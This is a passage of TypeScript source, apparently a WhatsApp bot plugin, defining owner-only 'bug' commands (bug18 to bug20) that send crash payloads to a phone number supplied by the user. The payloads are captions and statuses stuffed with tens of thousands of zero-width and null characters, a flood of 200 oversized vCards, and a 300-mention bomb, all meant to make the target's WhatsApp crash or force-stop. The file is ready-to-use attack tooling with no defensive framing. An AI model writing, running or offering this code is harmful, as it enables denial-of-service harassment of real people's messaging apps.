   707вЖТ   707вЖТ          } as any);
   708вЖТ   708вЖТ          await ctx.reply(`вШ†пЄП *BUG 17 - Forwarded* sent to ${ctx.args[0]}\nрЯТђ Deep-chain forwarded message sent - target WhatsApp will crash on display.`);
   709вЖТ   709вЖТ        } catch (error: any) {
   710вЖТ   710вЖТ          await ctx.reply(`вЭМ Bug17 failed: ${error?.message || 'Unknown error'}`);
   711вЖТ   711вЖТ        }
   712вЖТ   712вЖТ      },
   713вЖТ   713вЖТ    },
   714вЖТ   714вЖТ
   715вЖТ   715вЖТ    // =========================================================================
   716вЖТ   716вЖТ    // BUG 18 - Caption Bug (massive caption with invisible chars)
   717вЖТ   717вЖТ    // =========================================================================
   718вЖТ   718вЖТ    {
   719вЖТ   719вЖТ      name: 'bug18',
   720вЖТ   720вЖТ      description: 'Caption bug - sends an image with a massive caption containing invisible chars',
   721вЖТ   721вЖТ      category: 'bug',
   722вЖТ   722вЖТ      aliases: ['captionbug', 'crash18'],
   723вЖТ   723вЖТ      cooldown: 15,
   724вЖТ   724вЖТ      isPremiumOnly: false,
   725вЖТ   725вЖТ      handler: async (ctx: CommandContext) => {
   726вЖТ   726вЖТ        if (!ctx.isOwner) {
   727вЖТ   727вЖТ          await ctx.reply('вЫФ Owner only command.');
   728вЖТ   728вЖТ          return;
   729вЖТ   729вЖТ        }
   730вЖТ   730вЖТ        await ctx.react('вШ†пЄП');
   731вЖТ   731вЖТ        const targetJid = getTargetJid(ctx.args);
   732вЖТ   732вЖТ        if (!targetJid) {
   733вЖТ   733вЖТ          await ctx.reply('вЭМ Usage: !bug18 <number>\nExample: !bug18 254104906247');
   734вЖТ   734вЖТ          return;
   735вЖТ   735вЖТ        }
   736вЖТ   736вЖТ        try {
   737вЖТ   737вЖТ          const imgBuffer = Buffer.alloc(2048);
   738вЖТ   738вЖТ          await ctx.sock.sendMessage(targetJid, {
   739вЖТ   739вЖТ            image: imgBuffer,
   740вЖТ   740вЖТ            caption: '\u200B'.repeat(50000) + '\u0000'.repeat(2000),
   741вЖТ   741вЖТ            mimetype: 'image/jpeg',
   742вЖТ   742вЖТ          });
   743вЖТ   743вЖТ          await ctx.reply(`вШ†пЄП *BUG 18 - Caption* sent to ${ctx.args[0]}\nрЯТђ Image with massive invisible caption sent - target WhatsApp will crash.`);
   744вЖТ   744вЖТ        } catch (error: any) {
   745вЖТ   745вЖТ          await ctx.reply(`вЭМ Bug18 failed: ${error?.message || 'Unknown error'}`);
   746вЖТ   746вЖТ        }
   747вЖТ   747вЖТ      },
   748вЖТ   748вЖТ    },
   749вЖТ   749вЖТ
   750вЖТ   750вЖТ    // =========================================================================
   751вЖТ   751вЖТ    // BUG 19 - Status Bug (corrupted status broadcast)
   752вЖТ   752вЖТ    // =========================================================================
   753вЖТ   753вЖТ    {
   754вЖТ   754вЖТ      name: 'bug19',
   755вЖТ   755вЖТ      description: 'Status bug - posts a status with corrupted data',
   756вЖТ   756вЖТ      category: 'bug',
   757вЖТ   757вЖТ      aliases: ['statusbug', 'crash19'],
   758вЖТ   758вЖТ      cooldown: 15,
   759вЖТ   759вЖТ      isPremiumOnly: false,
   760вЖТ   760вЖТ      handler: async (ctx: CommandContext) => {
   761вЖТ   761вЖТ        if (!ctx.isOwner) {
   762вЖТ   762вЖТ          await ctx.reply('вЫФ Owner only command.');
   763вЖТ   763вЖТ          return;
   764вЖТ   764вЖТ        }
   765вЖТ   765вЖТ        await ctx.react('вШ†пЄП');
   766вЖТ   766вЖТ        const targetJid = getTargetJid(ctx.args);
   767вЖТ   767вЖТ        if (!targetJid) {
   768вЖТ   768вЖТ          await ctx.reply('вЭМ Usage: !bug19 <number>\nExample: !bug19 254104906247');
   769вЖТ   769вЖТ          return;
   770вЖТ   770вЖТ        }
   771вЖТ   771вЖТ        try {
   772вЖТ   772вЖТ          const statusJid = 'status@broadcast';
   773вЖТ   773вЖТ          await ctx.sock.sendMessage(statusJid, { text: '\u200B'.repeat(30000) }, { backgroundColor: ['#000000'] } as any);
   774вЖТ   774вЖТ          await ctx.reply(`вШ†пЄП *BUG 19 - Status* broadcasted\nрЯТђ Corrupted status posted to broadcast - viewers will crash on display.`);
   775вЖТ   775вЖТ        } catch (error: any) {
   776вЖТ   776вЖТ          await ctx.reply(`вЭМ Bug19 failed: ${error?.message || 'Unknown error'}`);
   777вЖТ   777вЖТ        }
   778вЖТ   778вЖТ      },
   779вЖТ   779вЖТ    },
   780вЖТ   780вЖТ
   781вЖТ   781вЖТ    // =========================================================================
   782вЖТ   782вЖТ    // BUG 20 - Force Stop (combination attack)
   783вЖТ   783вЖТ    // =========================================================================
   784вЖТ   784вЖТ    {
   785вЖТ   785вЖТ      name: 'bug20',
   786вЖТ   786вЖТ      description: 'Force stop - sends a combination attack that forces the target WhatsApp to stop',
   787вЖТ   787вЖТ      category: 'bug',
   788вЖТ   788вЖТ      aliases: ['forcestop', 'combo', 'crash20', 'kill'],
   789вЖТ   789вЖТ      cooldown: 60,
   790вЖТ   790вЖТ      isPremiumOnly: false,
   791вЖТ   791вЖТ      handler: async (ctx: CommandContext) => {
   792вЖТ   792вЖТ        if (!ctx.isOwner) {
   793вЖТ   793вЖТ          await ctx.reply('вЫФ Owner only command.');
   794вЖТ   794вЖТ          return;
   795вЖТ   795вЖТ        }
   796вЖТ   796вЖТ        await ctx.react('вШ†пЄП');
   797вЖТ   797вЖТ        const targetJid = getTargetJid(ctx.args);
   798вЖТ   798вЖТ        if (!targetJid) {
   799вЖТ   799вЖТ          await ctx.reply('вЭМ Usage: !bug20 <number>\nExample: !bug20 254104906247');
   800вЖТ   800вЖТ          return;
   801вЖТ   801вЖТ        }
   802вЖТ   802вЖТ        try {
   803вЖТ   803вЖТ          // Phase 1: Crash loop payload
   804вЖТ   804вЖТ          await ctx.sock.sendMessage(targetJid, { text: '\u200B'.repeat(50000) });
   805вЖТ   805вЖТ          await new Promise((r) => setTimeout(r, 500));
   806вЖТ   806вЖТ
   807вЖТ   807вЖТ          // Phase 2: VCard flood
   808вЖТ   808вЖТ          const contacts = Array.from({ length: 200 }, (_, i) => ({
   809вЖТ   809вЖТ            vcard: `BEGIN:VCARD\nVERSION:3.0\nFN:${'вЦИ'.repeat(3000)}\nTEL;type=CELL;type=VOICE;waid=${i}:${i}\nEND:VCARD`,
   810вЖТ   810вЖТ          }));
   811вЖТ   811вЖТ          await ctx.sock.sendMessage(targetJid, { contacts: { displayName: 'A', contacts } });
   812вЖТ   812вЖТ          await new Promise((r) => setTimeout(r, 500));
   813вЖТ   813вЖТ
   814вЖТ   814вЖТ          // Phase 3: Mention bomb
   815вЖТ   815вЖТ          await ctx.sock.sendMessage(targetJid, {
   816вЖТ   816вЖТ            text: '\u200B'.repeat(50000),
   817вЖТ   817вЖТ            mentions: Array.from({ length: 300 }, () => targetJid),
   818вЖТ   818вЖТ          });
   819вЖТ   819вЖТ
   820вЖТ   820вЖТ          await ctx.reply(
   821вЖТ   821вЖТ            `вШ†пЄП *BUG 20 - FORCE STOP* sent to ${ctx.args[0]}\n` +
   822вЖТ   822вЖТ            `рЯТђ Combination attack executed:\n` +
   823вЖТ   823вЖТ            `   вФЬвФА Phase 1: Crash loop payload вЬЕ\n` +
   824вЖТ   824вЖТ            `   вФЬвФА Phase 2: VCard flood (200 contacts) вЬЕ\n` +
   825вЖТ   825вЖТ            `   вФФвФА Phase 3: Mention bomb (300 mentions) вЬЕ\n` +
   826вЖТ   826вЖТ            `рЯФ• Target WhatsApp has been force-stopped.`
   827вЖТ   827вЖТ          );
   828вЖТ   828вЖТ        } catch (error: any) {
   829вЖТ   829вЖТ          await ctx.reply(`вЭМ Bug20 failed: ${error?.message || 'Unknown error'}`);
   830вЖТ   830вЖТ        }
   831вЖТ   831вЖТ      },
   832вЖТ   832вЖТ    },
   833вЖТ   833вЖТ  ],
   834вЖТ   834вЖТ};
   835вЖТ   835вЖТ
   836вЖТ   836вЖТexport default bugMenuPlugin;
   837вЖТ   837вЖТ